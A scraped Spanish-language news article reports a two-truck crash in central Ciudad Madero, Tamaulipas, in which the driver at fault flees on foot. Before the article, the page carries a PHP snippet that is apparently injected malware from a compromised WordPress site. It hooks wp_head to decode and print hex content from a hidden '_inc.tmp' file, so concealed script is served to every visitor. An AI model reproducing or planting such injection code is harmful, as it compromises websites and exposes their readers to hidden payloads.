if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Aparatoso choque de camionetas en Ciudad Madero, dos lesionados – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Aparatoso choque de camionetas en Ciudad Madero, dos lesionados

Aparatoso choque de camionetas en Ciudad Madero, dos lesionados

Ciudad Madero, Tamaulipas.- Dos personas resultaron lesionadas en un fuerte choque de camionetas ocurrido en la zona centro de este municipio, cuando uno de los conductores se pasó una señal de alto, para después darse a la fuga a pie con serias heridas, dejando abandonado a quien iba de copiloto.

El accidente ocurrió este jueves por la mañana en el cruce de las calles Durango y Pedro José Méndez, siendo el responsable el conductor de una camioneta Chrysler, Aspen, color blanco, esto de acuerdo a las primeras versiones surgidas en el lugar.

Testigos refieren que la camioneta Aspen circulaba a exceso de velocidad por la calle Durango y al salir a la Pedro José Méndez no hizo alto, lo que provocó que fuera chocada por una camioneta Chevrolet Pick Up que se dirigía a la avenida Obregón.

Con la fuerza del impacto ambas unidades fueron proyectadas hacia un costado, siendo la Aspen la que golpeó de costado contra un poste de concreto, resultado lesionados el conductor y un acompañante.

De acuerdo a algunas personas, el conductor se bajó de la unidad con heridas de profundo sangrado y huyó caminando, mientras que el interior de la camioneta quedó la otra persona.

Al lugar acudieron elementos de Cruz Roja y Tránsito para tomar conocimiento de los hechos.

De manera extraoficial se dijo que el conductor de la Aspen estaba probando la camioneta porque supuestamente la iba a comprar, lo que no se explican es que arrancara a toda velocidad de la oficina fiscal a la otra calle, sin que esta versión fuera confirmada por las autoridades.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas